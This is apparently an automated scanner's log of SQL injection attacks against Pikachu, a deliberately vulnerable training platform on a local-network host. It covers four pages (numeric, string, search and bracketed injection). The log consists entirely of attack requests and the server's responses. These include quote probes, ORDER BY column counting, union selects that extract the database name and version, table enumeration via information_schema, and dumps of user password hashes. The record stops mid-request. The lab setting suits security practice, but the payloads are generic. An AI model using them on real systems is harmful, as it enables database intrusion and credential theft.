网站动态输出记录 - 开始时间: 2025-10-30 13:40:17
============================================================

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'id': '1', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST id=1
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
email is
[网页关键信息]:
email is: .han

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'id': "1'", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST id=1'
[状态码]: 200
[响应变化]:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
MySQL server version for the right syntax
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 ORDER BY 1'}
--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
email is
[网页关键信息]:
email is: .han

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 ORDER BY 2'}
--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
email is
[网页关键信息]:
email is: .han

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 ORDER BY 3'}
--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
Unknown column '3' in 'order clause
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 union select 1,1'}
--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
hello,1 your email is: 1
email is
[网页关键信息]:
email is: kachu

--------------------------------------------------
[时间]: 13:40:17
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 union select 2,2'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
hello,2 your email is: 2
email is
[网页关键信息]:
email is: kachu

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 union select 1,2'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
hello,1 your email is: 2
email is
[网页关键信息]:
email is: kachu

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
email is
[网页关键信息]:
email is: .han

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': "1 union select 1,concat(database(),'|',version())"}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
hello,1 your email is: pikachu
email is
pikachu|5.5.53
[网页关键信息]:
email is: chu

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': 'test'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
Unknown column 'test' in 'where clause
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 union select 1,group_concat(table_name) from information_schema.tables WHERE table_schema=database()'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
hello,1 your email is: httpinfo
email is
[网页关键信息]:
email is: info

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
email is
[网页关键信息]:
email is: .han

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1 union select username,password from users'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
hello,admin your email is: e10adc3949ba59abbe56e057f20f883e
hello,pikachu your email is: 670b14728ad9902aecba32e22fa4f6bd
hello,test your email is: e99a18c428cb38d5f260853678922e03
email is
[网页关键信息]:
email is: e10adc3949ba59abbe56e057f20f883e

--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[方法]: POST
[数据]: {'submit': '查询', 'id': '1'}
--------------------------------------------------
[时间]: 13:40:18
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[测试]: POST submit=查询
[状态码]: 200
[响应变化]:
hello,vince your email is: vince@pikachu.com
email is
[网页关键信息]:
email is: .han

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince'", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince'
[状态码]: 200
[响应变化]:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''vince''' at line 1
MySQL server version for the right syntax
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' ORDER BY 1 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' ORDER BY 1 # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: .han

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' ORDER BY 2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' ORDER BY 2 # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: .han

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' ORDER BY 3 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' ORDER BY 3 # 
[状态码]: 200
[响应变化]:
Unknown column '3' in 'order clause
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' union select 1,1 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' union select 1,1 # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: 1

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' union select 2,2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' union select 2,2 # 
[状态码]: 200
[响应变化]:
your uid:1
your uid:2
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: 2

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' union select 1,2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' union select 1,2 # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: 2

--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': 'vince', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:19
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: .han

--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' union select 1,concat(database(),'|',version()) # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' union select 1,concat(database(),'|',version()) # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
pikachu|5.5.53
[网页关键信息]:
uid:1
email is: ikachu

--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': 'test', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=test
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' union select 1,group_concat(table_name) from information_schema.tables WHERE table_schema=database() # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' union select 1,group_concat(table_name) from information_schema.tables WHERE table_schema=database() # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: ttpinfo

--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': 'vince', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: .han

--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': "vince' union select username,password from users # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince' union select username,password from users # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: s

--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[方法]: GET
[参数]: {'name': 'vince', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:20
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_str.php
[测试]: GET name=vince
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: .han

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "a%'", 'submit': '搜索'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a%'
[状态码]: 200
[响应变化]:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
MySQL server version for the right syntax
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "a' ORDER BY 1 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a' ORDER BY 1 # 
[状态码]: 200
[响应变化]:
0o。..没有搜索到你输入的信息！
[网页关键信息]:
username：进行查找

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "a' ORDER BY 2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a' ORDER BY 2 # 
[状态码]: 200
[响应变化]:
0o。..没有搜索到你输入的信息！
[网页关键信息]:
username：进行查找

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "a' ORDER BY 3 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a' ORDER BY 3 # 
[状态码]: 200
[响应变化]:
0o。..没有搜索到你输入的信息！
[网页关键信息]:
username：进行查找

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "a' ORDER BY 4 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a' ORDER BY 4 # 
[状态码]: 200
[响应变化]:
Unknown column '4' in 'order clause
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "vince' union select 1,1,1 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince' union select 1,1,1 # 
[状态码]: 200
[响应变化]:
username
email is
username：vince uid:1 email
[网页关键信息]:
username：进行查找
uid:1
email is: 1

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "vince' union select 2,2,2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince' union select 2,2,2 # 
[状态码]: 200
[响应变化]:
username
email is
username：vince uid:1 email
[网页关键信息]:
username：进行查找
uid:1
email is: 2

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "vince' union select 1,2,3 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince' union select 1,2,3 # 
[状态码]: 200
[响应变化]:
username
email is
username：vince uid:1 email
[网页关键信息]:
username：进行查找
uid:1
email is: 3

--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': 'a', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:21
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a
[状态码]: 200
[响应变化]:
username
email is
用户名中含有a的结果如下
username：allen uid:2 email
[网页关键信息]:
用户名中含有a的结果如下： username：allen uid:2 email is: allen@pikachu.com username：grady uid:4 email is: grady@pikachu.com Pikachu PIKA~ PIKA~© runner.han

--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "vince' union select 1,2,concat(database(),'|',version()) # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince' union select 1,2,concat(database(),'|',version()) # 
[状态码]: 200
[响应变化]:
username
email is
username：vince uid:1 email
pikachu|5.5.53
[网页关键信息]:
username：进行查找
uid:1
email is: pikachu

--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': 'test', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=test
[状态码]: 200
[响应变化]:
0o。..没有搜索到你输入的信息！
[网页关键信息]:
username：进行查找

--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "vince' union select 1,2,group_concat(table_name) from information_schema.tables WHERE table_schema=database() # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince' union select 1,2,group_concat(table_name) from information_schema.tables WHERE table_schema=database() # 
[状态码]: 200
[响应变化]:
username
email is
username：vince uid:1 email
schema=database
[网页关键信息]:
username：进行查找
uid:1
email is: httpinfo

--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': 'vince', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince
[状态码]: 200
[响应变化]:
username
email is
用户名中含有vince的结果如下
username：vince uid:1 email
[网页关键信息]:
用户名中含有vince的结果如下： username：vince uid:1 email is: vince@pikachu.com Pikachu PIKA~ PIKA~© runner.han

--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': "vince' union select 1,username,password from users # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=vince' union select 1,username,password from users # 
[状态码]: 200
[响应变化]:
username
password from
email is
username,password from users # 的结果如下： username：vince uid:1 email
[网页关键信息]:
username：进行查找
uid:1
email is: is

--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[方法]: GET
[参数]: {'name': 'a', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:22
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[测试]: GET name=a
[状态码]: 200
[响应变化]:
username
email is
用户名中含有a的结果如下
username：allen uid:2 email
[网页关键信息]:
用户名中含有a的结果如下： username：allen uid:2 email is: allen@pikachu.com username：grady uid:4 email is: grady@pikachu.com Pikachu PIKA~ PIKA~© runner.han

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1')", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1')
[状态码]: 200
[响应变化]:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
MySQL server version for the right syntax
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') ORDER BY 1 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') ORDER BY 1 # 
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') ORDER BY 2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') ORDER BY 2 # 
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') ORDER BY 3 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') ORDER BY 3 # 
[状态码]: 200
[响应变化]:
Unknown column '3' in 'order clause
[网页关键信息]:
[内容预览]: Get the pikachu Pikachu 漏洞练习平台 pika~pika~ 欢迎 骚年 系统介绍 暴力破解 概述 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? Cross-Site Scripting 概述 反射型xss(get) 反射型xss(post) 存储型xss DOM型xss DOM型xss-x xss之盲打 xss之...

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') union select 1,1 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') union select 1,1 # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: n

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') union select 2,2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') union select 2,2 # 
[状态码]: 200
[响应变化]:
your uid:2
email is
username? your uid:2 your email
[网页关键信息]:
uid:2
email is: n

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') union select 1,2 # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') union select 1,2 # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: n

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': '1', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') union select 1,concat(database(),'|',version()) # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') union select 1,concat(database(),'|',version()) # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
pikachu|5.5.53
[网页关键信息]:
uid:1
email is: n

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': 'test', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=test
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

--------------------------------------------------
[时间]: 13:40:23
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') union select 1,group_concat(table_name) from information_schema.tables WHERE table_schema=database() # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1') union select 1,group_concat(table_name) from information_schema.tables WHERE table_schema=database() # 
[状态码]: 200
[响应变化]:
your uid:1
email is
username? your uid:1 your email
[网页关键信息]:
uid:1
email is: u

--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': '1', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': "1') union select username,password from users # ", 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
